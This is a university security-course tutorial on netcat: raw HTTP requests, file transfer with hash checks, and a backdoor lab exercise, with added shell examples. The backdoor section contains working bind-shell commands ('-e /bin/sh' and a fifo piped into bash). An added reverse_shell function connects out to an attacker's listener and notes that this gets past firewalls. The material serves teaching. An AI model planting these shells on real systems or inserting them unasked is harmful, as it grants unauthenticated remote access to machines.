Netcat is often described as the Swiss Army knife of TCP/IP. It does a lot, and knowing how to use it is invaluable in security work. It is rarely the optimal tool for a job, but it is far quicker than writing a custom client or server for a one-off task.
Netcat's simplest use is as a replacement for telnet: it opens a TCP connection, sends whatever you type to the remote end, and prints whatever comes back. Try the following:
$ nc www.northwestern.edu 80
GET / HTTP/1.1^M
Host: www.northwestern.edu^M
^M
Where it says ^M, you actually have to press control-v and then enter: control-v tells the terminal to pass the next keystroke through literally, and enter produces a carriage return, which the terminal echoes as ^M. Then press enter again to send the line. HTTP requires every line of the request to end in a carriage return followed by a line feed, and the request ends with an empty line. Note that with HTTP/1.1 the server keeps the connection open after its response, so netcat will sit waiting until the server times out; press control-c, or add a Connection: close header. Optionally, you can add more headers to your request:
$ nc www.northwestern.edu 80
GET / HTTP/1.1^M
Host: www.northwestern.edu^M
Accept: text/html;q=0.9,text/plain;q=0.8^M
User-Agent: Mozilla/5.0 (Unknown; en-us)^M
Accept-Language: en-us,en;q=0.5^M
^M
Another way to do this (which avoids pressing control-v all the time) is to pipe the output of some command into netcat, letting the command produce the carriage return and line feed pairs (\r\n) for you. Here's an example using ruby:
$ ruby -e 'print "GET / HTTP/1.1\r\nHost: www.northwestern.edu\r\n\r\n"' | nc www.northwestern.edu 80
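The same idea with nothing but the shell's own printf, as an added example that is not part of the original tutorial. It builds the request with proper CR LF line endings and a Connection: close header (so the server hangs up and netcat exits on its own), gives you a way to confirm the bytes are right before sending, and hands the request to nc. The function names, the -w 5 timeout and the use of www.northwestern.edu as the default host are this example's choices, not something the tutorial specifies.

```shell
#!/bin/sh
# Added example: build an HTTP/1.1 request with CRLF line endings and
# send it with nc. Not from the original tutorial; host and path are
# parameters, with the tutorial's target reused only as a default.

# Print a minimal request for PATH on HOST.  printf turns \r\n into real
# CR LF bytes, which is what the control-v trick produces by hand.
# "Connection: close" asks the server to hang up after one response;
# without it HTTP/1.1 keeps the connection open and nc keeps waiting.
build_request() {   # build_request HOST [PATH]
    host="$1"
    path="${2:-/}"
    printf 'GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' \
        "$path" "$host"
}

# Count the carriage returns in the request, to confirm every line really
# ends in CR LF.  The request above has four lines, so the answer is 4.
count_cr() {   # count_cr HOST [PATH]
    build_request "$@" | tr -cd '\r' | wc -c | tr -d ' '
}

# Send the request and print just the status line of the reply.
# -w 5 caps how long nc waits (both netcat flavours support -w); the
# final tr strips the CR so the result compares cleanly in a script.
http_status() {   # http_status HOST [PATH]   (needs network access)
    host="$1"
    path="${2:-/}"
    build_request "$host" "$path" | nc -w 5 "$host" 80 | head -n 1 | tr -d '\r'
}

# Inspect the raw bytes before trusting them:
#   build_request www.northwestern.edu / | od -c
# Then fetch for real:
#   http_status www.northwestern.edu /
```

Run the od -c line first: you should see \r \n at the end of every line, and a lone \r \n as the last two bytes. If you see only \n, your shell's printf is not interpreting the escapes and the server may reject or stall on the request.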
Common command line flags
-l    Sets up netcat to listen for incoming TCP connections instead of connecting out. On the traditional netcat you use this in conjunction with -p; on the OpenBSD netcat that most Linux distributions ship, the port is given as an argument instead (nc -l 3000), and combining -p with -l is an error.
-p    Specifies a port for netcat to listen on (traditional netcat), or the local source port to use for an outgoing connection.
-v    Increases the verbosity level; -vv is more verbose still and reports when connections are opened and closed.
-n    Disables name resolution, so hosts and ports must be given numerically. Useful when DNS is slow or when you do not want a lookup to be seen.
-e    Executes a program once a connection is made, with the program's standard input and output attached to the connection. Not present in every build (see the backdoor section below).
One thing you might come across is a host you can reach over the network but on which it is hard to get files (no scp, no ftp, no shared filesystem). Netcat can transfer files for you. On the machine that will receive the file:
$ nc -vv -l 3000 > file
And on the machine from which you want to send the file:
$ nc -vv hostname 3000 < file
These simple commands just shovel the contents of a file over a TCP connection: no authentication, no encryption and no integrity check, so compare a checksum (md5sum or sha256sum) on both ends afterwards. With the OpenBSD netcat the sender does not close the connection when it reaches the end of the file unless you add -N (spelled -q 1 on Debian-derived builds), so add that flag or press control-c on the sender once the transfer is done. If you try this, note that in many cases these transfers will be blocked by a firewall. Try transferring a file from a machine in the Wilkinson lab to hamsa.
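The transfer above, wrapped so that you can verify the file arrived intact and rehearse the whole round trip on one machine before relying on it. This is an added example, not part of the original tutorial; it assumes the OpenBSD-style netcat (nc -l PORT, and -N to close after end of file), and the function names, port and hostname arguments are this example's own.

```shell
#!/bin/sh
# Added example: netcat file transfer with an integrity check.
# Not from the original tutorial.  Assumes OpenBSD-style nc syntax
# (nc -l PORT, -N); traditional netcat wants "nc -l -p PORT" and "-q 1".

# Hash a file with whatever is installed: sha256sum (GNU coreutils),
# shasum (BSD/macOS), or POSIX cksum as a last resort.  Prints the digest only.
file_hash() {   # file_hash FILE
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | cut -d' ' -f1
    else
        cksum "$1" | cut -d' ' -f1
    fi
}

# Succeed (exit 0) when two files hash the same, fail otherwise.
same_hash() {   # same_hash FILE1 FILE2
    [ "$(file_hash "$1")" = "$(file_hash "$2")" ]
}

# Receiving side: run this first.  Accepts one connection on PORT and
# writes everything that arrives into OUTFILE.
recv_file() {   # recv_file PORT OUTFILE
    nc -l "$1" > "$2"
}

# Sending side.  -N shuts the socket down for writing once stdin hits
# end of file, so the listener sees EOF and exits instead of both ends
# waiting on each other forever.
send_file() {   # send_file HOST PORT FILE
    nc -N "$1" "$2" < "$3"
}

# Whole round trip over loopback: background listener, send, wait,
# compare hashes.  Prints the digest on success, fails on a mismatch.
transfer_loopback() {   # transfer_loopback FILE PORT
    out="$(mktemp)"
    recv_file "$2" "$out" &
    sleep 1                      # give the listener a moment to bind
    send_file 127.0.0.1 "$2" "$1"
    wait
    if same_hash "$1" "$out"; then
        echo "ok: $(file_hash "$out")"
        rm -f "$out"
    else
        echo "MISMATCH: $1 and $out differ" >&2
        return 1
    fi
}

# Usage: transfer_loopback /etc/hostname 3000
```

Between two real machines, run file_hash on the original, do the transfer with recv_file and send_file, then run file_hash on the copy; a differing digest usually means the sender was interrupted or the listener was killed early, not that netcat corrupted anything.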
Creating a simple backdoor
Netcat can execute a program when it receives a connection, attaching the program's input and output to the socket. This feature makes it trivial to create a back door on a machine: the shell runs as whoever started netcat, and anyone who can reach the port gets it, with no authentication at all.
$ nc -l -p 5300 -e /bin/sh
And now from any machine:
$ nc target_ip 5300
However, the -e flag is missing from many netcat builds: the OpenBSD netcat does not have it at all, and the traditional netcat only includes it when compiled with the GAPING_SECURITY_HOLE option (Ncat, from the Nmap project, still provides it). You can emulate the behaviour with a named pipe, though it is not as quiet, since it leaves a fifo on disk and two processes in the process list. Netcat reads its standard input from the fifo and writes whatever the client sends to its standard output, which is piped into bash; bash's output goes into the fifo and so back over the connection. Bash's error output is not redirected here, so errors stay on the listener's terminal unless you add 2>&1 after 1>foo. This form uses the OpenBSD argument style (nc -l 5300); with the traditional netcat write nc -l -p 5300.
$ mkfifo foo; nc -l 5300 0<foo | /bin/bash 1>foo
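The fifo trick packaged so that it also captures the shell's error output and cleans up after itself, as an added example that is not part of the original tutorial. It also goes beyond the page's bind shell with the reverse direction, where the target connects out to a listener you already run; that is the same plumbing with the nc invocation swapped. It assumes the OpenBSD-style netcat (nc -l PORT); the function names and the host and port arguments are this example's own.

```shell
#!/bin/sh
# Added example: the named-pipe shell from the tutorial, with stderr
# captured and a private fifo that is removed afterwards, plus the
# reverse-shell direction.  Not from the original tutorial.
# Assumes OpenBSD-style nc syntax (nc -l PORT).

# Create a fifo in a fresh 0700 temp directory and print its path.
# A fixed name like "foo" in the current directory can be clobbered by
# anyone with write access there; a random path is a little safer.
make_fifo() {
    dir="$(mktemp -d)"
    mkfifo -m 600 "$dir/f"
    printf '%s\n' "$dir/f"
}

# Bind shell: wait for one connection on PORT and hand it /bin/sh.
# Data flow: nc stdout (bytes the client typed) -> sh stdin;
#            sh stdout and stderr -> fifo -> nc stdin -> client.
# The 2>&1 is what the one-liner above lacks: without it, error
# messages go to this terminal instead of to the client.
bind_shell() {   # bind_shell PORT
    f="$(make_fifo)"
    nc -l "$1" < "$f" | /bin/sh > "$f" 2>&1
    rm -rf "$(dirname "$f")"     # runs once the client disconnects
}

# Reverse shell: identical plumbing, but nc connects out to HOST PORT,
# where you are already running "nc -l PORT".  Outbound connections are
# far more often allowed through a firewall than inbound ones, which is
# why this direction is the more common one in practice.
reverse_shell() {   # reverse_shell HOST PORT
    f="$(make_fifo)"
    nc "$1" "$2" < "$f" | /bin/sh > "$f" 2>&1
    rm -rf "$(dirname "$f")"
}

# Usage:  bind_shell 5300          then, elsewhere:  nc target_ip 5300
#         reverse_shell your_ip 5300   after running:  nc -l 5300  on your_ip
```

Either way, everything goes over the wire in the clear and anyone who reaches the port first gets the shell; on a shared machine, run it only for as long as the exercise needs, and remember that a listening nc with a shell behind it is exactly what ss -ltnp or lsof -i will show an administrator.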
There is a lot that you can do with netcat, and a short tutorial doesn't do it justice. If you have time, read through the man page (man nc, or man netcat, depending on your system) or search online for things to try with it.
Show that you can successfully download the web page at www.google.com. Transfer an arbitrary file using netcat and verify that it arrived intact. Show that you can create a netcat backdoor, and demonstrate an understanding of netcat's usefulness as both a TCP client and a TCP server.
Copyright 2008 by the following authors:
Sam McIngvale
Jim Spadaro
Whitney Young
All rights reserved. Permission to reproduce this document in whole or in part must be obtained from the authors.